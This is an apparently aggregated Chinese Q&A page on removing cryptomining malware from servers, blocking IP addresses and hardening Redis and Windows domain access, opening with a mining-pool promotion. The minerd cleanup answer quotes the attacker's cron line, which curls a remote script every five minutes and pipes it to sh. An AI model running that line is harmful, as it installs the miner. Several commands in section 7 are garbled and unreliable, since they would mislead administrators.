如何關閉訪問挖礦伺服器的訪問
沒有那麼容易關閉,我之前一直在使用魚池,但是魚池不太歡迎我這種小型礦工,後來就轉到哈魚礦工,礦池的算力也不低。
使用哈魚礦池最大的優勢就是,只要你連到礦池可以使用手機APP監控礦機,每天提現,而且用戶的也在一直增加,並且有在線的客服解答你的任何問題!
2. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
3. 伺服器如何禁止某IP進行訪問
利用組策略里的IP安全設置可以達到樓主的要求
為了說明,我告訴一下我的設置
我的電腦IP
192.168.0.100
路由器
ip
192.168.0.1
我通過如何阻止
我和路由器之間的相互PING來演示操作過程
首先
打開組策略
進入計算機配置裡面的安全設置,點裡面的IP安全策略
創建新的IP策略
下一步
隨便輸入名稱
我就用
"阻止"
然後點
下一步
激活默認響應規則打勾
下一步
驗證方法選第一個
V5協議
可能會有個警告,直接確定就好了
編輯屬性打勾
完成
回到原來的界面,點新建的名稱
"阻止"
他會出來個屬性窗口
點擊添加
下一步
不指定隧道
下一步
所有網路連結
下一步
V5協議
下一步
這時候應該是個安全規則向導界面
點添加
出來IP篩選列表
點添加
下一步
源地址用我的IP地址
下一步
目標IP地址
用一個特定的IP地址,然後輸入你想阻止的IP地址
我這里用192.168.0.1
下一步
協議,針對你的游戲伺服器用的通訊協議,自己選擇,一般都是TCP
我這里使用ICMP
下一步
編輯屬性打勾
下一步
出來篩選器屬性
鏡像一定要打勾,這樣就能屏蔽遠程IP了
然後點確定
回到了IP篩選器列表,點確定
點你剛剛建立的IP篩選器,如果上面沒有命名,那麼她的名字應該是
新的IP篩選器列表,點上圈圈下一步,進入篩選器操作
點阻止,下一步
完成
新規則屬性
不用搞,只要點確定然後點關閉
現在回到原來的組策略界面
右鍵點我們剛剛建立的
名稱為阻止
,選擇指配
這時候,它的策略已指配
變成
是了
我這邊現在PING
192.168.0.1
已經顯示
C:\Documents
and
Settings\Administrator>ping
192.168.0.1
Pinging
192.168.0.1
with
32
bytes
of
data:
Destination
host
unreachable.
Destination
host
unreachable.
Destination
host
unreachable.
Destination
host
unreachable.
Ping
statistics
for
192.168.0.1:
Packets:
Sent
=
4,
Received
=
0,
Lost
=
4
(100%
loss),
然後我們試試右鍵點擊
阻止,選擇
不指配
C:\Documents
and
Settings\Administrator>ping
192.168.0.1
Pinging
192.168.0.1
with
32
bytes
of
data:
Reply
from
192.168.0.1:
bytes=32
time=1ms
TTL=127
Reply
from
192.168.0.1:
bytes=32
time=1ms
TTL=127
Reply
from
192.168.0.1:
bytes=32
time=2ms
TTL=127
Reply
from
192.168.0.1:
bytes=32
time=1ms
TTL=127
Ping
statistics
for
192.168.0.1:
Packets:
Sent
=
4,
Received
=
4,
Lost
=
0
(0%
loss),
Approximate
round
trip
times
in
milli-seconds:
Minimum
=
1ms,
Maximum
=
2ms,
Average
=
1ms
很明顯,策略已經成功達到我們要的效果了
打的我好累....
恩,再次提醒,上面中的那個鏡像一定要選擇
不然就是我不能PING通路由器
路由器能PNG通我了
鏡像的作用是雙向禁止
按照上面的操作,我想樓主應該能達到自己要求的效果了
不過如果對方是動態IP,以上操作就沒什麼用了
以上
4. windows伺服器的挖礦進程怎麼關閉刪除
這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後,使用裡面的病毒查殺功能,直接就可以查殺這種電腦病毒了
5. 「關閉遠程訪問或限制訪問的ip地址」 怎麼關閉呢阿里雲的伺服器。這個問題如何解決的啊
登陸阿里雲之後提交工單,然後讓技術給個教程就可以了啊。幫助中心有教程的
6. 怎麼取消去除代理伺服器訪問限制 急急急
代理伺服器訪問限制是因為你使用了代理伺服器了,要想去除伺服器限制就要求你把你的代理去除,而代理伺服器可以在Internet設置里取消,把『http』的代理關掉。下面分享下win10系統取消代理伺服器的具體方法:
1、按下「Win+R」組合鍵打開運行。
7. 如何把右下角挖礦測試去除
一種是使用雲安全中心自動清理,另一種是手動清除。登錄到雲安全中心控制台左側欄,選擇威脅檢測,安全告警處理在安全告警處理列表中,找到挖礦程序,然後點處理雲安全中心安全告警處理然後根據提示一步步操作即可。
去除的方法
手動清除挖礦程序護雲盾以Linux伺服器為例,按照以下步驟排查及處理查看挖礦進程的執行PID,命令表示該進程的PID。清除挖礦進程的執行文件,在高CPU消耗的進程中定位到挖礦進程,並殺死該進程。
檢查雲伺服器的防火牆中是否存在挖礦程序的礦池地址,可疑通信地址和開放埠,命令iptablesLn執行以下命令清除惡意礦池地址vietcsysconfigiptables排查是否存在定時任務crontabl根據排查的結果,對可疑的定時任務文件進行清理,防止二次入侵。
8. java 如何禁止通過ip訪問伺服器,而只能通過域名訪問如果是通過ip訪問,那麼跳轉到相應的提示頁面,謝謝
禁止通過ip訪問伺服器:不需要編程即可實現。
如果伺服器是IIS:把默認站點設置成【跳轉到相應的提示頁面】即可;
同時把你的域名站,用
80埠
的指定域名即可。
具體操作是:新建域名站--》指定
埠8080
等--》到站點屬性的【高級】中,添加域名和埠80的指定即可。
9. 如何阻止對伺服器的非法網路訪問
答1:
每一台客戶機都可以訪問對方的網路賬戶。要阻止這種事情發生,把本地管理員賬戶名稱改為用戶不知道的其它名稱。這很容易做到,簡單地通過組策略就可以實現。我還要修改域控制器和工作站賬戶。這將迫使每一個人都使用分配給他們的域用戶賬戶。如果你要查看誰試圖訪問這個賬戶,你可以創建一個虛假的、關閉功能的管理員賬戶,並把這個賬戶用於安全登錄的目的。">這聽起來好像是所有這些系統都是使用同樣的用戶名和口令創建的。我傾向於認為他們在使用「管理員」用戶名。而且,如果這個「管理員」賬戶在這兩台計算機上都有,並且這個賬戶的口令是「p@ssw0rd」,每一台客戶機都可以訪問對方的網路賬戶。要阻止這種事情發生,把本地管理員賬戶名稱改為用戶不知道的其它名稱。這很容易做到,簡單地通過組策略就可以實現。我還要修改域控制器和工作站賬戶。這將迫使每一個人都使用分配給他們的域用戶賬戶。如果你要查看誰試圖訪問這個賬戶,你可以創建一個虛假的、關閉功能的管理員賬戶,並把這個賬戶用於安全登錄的目的。
答2:
我會檢查域安全政策和本地安全政策。確認每一個人都加入了這個域,而且你的許可沒有限制。用戶必須獲得批准才能訪問這個域和資源。你在管理工具中能夠發現大多數這些內容。刪除在XP主機中的工作組PC(輸入域名系統前綴並且選擇「改變域名系統前綴」)。
答3:
要限制本地登錄,你可以使用組策略。有一種安全設置可以在組策略中進行設置。閱讀微軟知識庫中編號823659的文章可以了解這種設置方法。
你還可以修改NTFS(新技術文件系統)安全設置來控制最終用戶訪問的文件/文件夾。設置這個功能,這樣只有獲得批準的域的未經授權的用戶能夠訪問你認為可以訪問的內容。
如果你知道正在使用的用戶名和口令是什麼,修改這些用戶名和口令。如果這是本地計算機管理員的賬戶,有許多可用的腳本能夠很方便地進行這種修改。共2頁。
答4:
你好像有一個像工作組一樣工作的域。如果你擁有這個許可權,創建一個與本地賬戶名稱不同的域賬戶。然後,然後關閉用來繞過域安全措施的任何域賬戶(或者至少要修改口令),強制用戶使用他們的域賬戶。你需要確認用戶必須使用他們自己的域賬戶訪問他們在伺服器上需要的資源。
然而,要記住,我在推測工作站是域成員。一旦用戶開始使用域賬戶登錄,你就可以使用組和策略來管理他們。
對於記錄來說,DHCP伺服器是什麼設備都沒有關系,只要它能夠提供合適的地址和你的環境選項就行。路由器對於一個單個的子網是一種合理的選擇。由於路由器沒有硬碟,路由器可能會比伺服器更可靠。
答5:
我是這樣做的。首先,進入「開始」->「程序」->「管理工具」->域控制器安全策略。然後進入安全選項。
下一步,驗證如下兩個項目:
網路接入:允許「每一個人」申請匿名用戶--->關閉。
網路接入:不允許匿名列舉存儲域管理賬戶和共享--->打開。
選擇這兩個選項應該能夠糾正匿名訪問問題。
最後,我會驗證這些用戶登錄使用的本地賬戶與你的預的賬戶不一樣,或者是你域控制器本地的賬戶。如果你讓他們相同的話,這些用戶名可以是一樣的。但是,你必須確認口令是不同的,而且用戶不知道這個口令是什麼。因此,如果這些用戶名是相同的,域將提示用戶輸入口令。遺憾的是Windows僅證實用戶名,不驗證這種安全識別符號。按照這些步驟應該能夠解決你的伺服器的未經授權的訪問難題。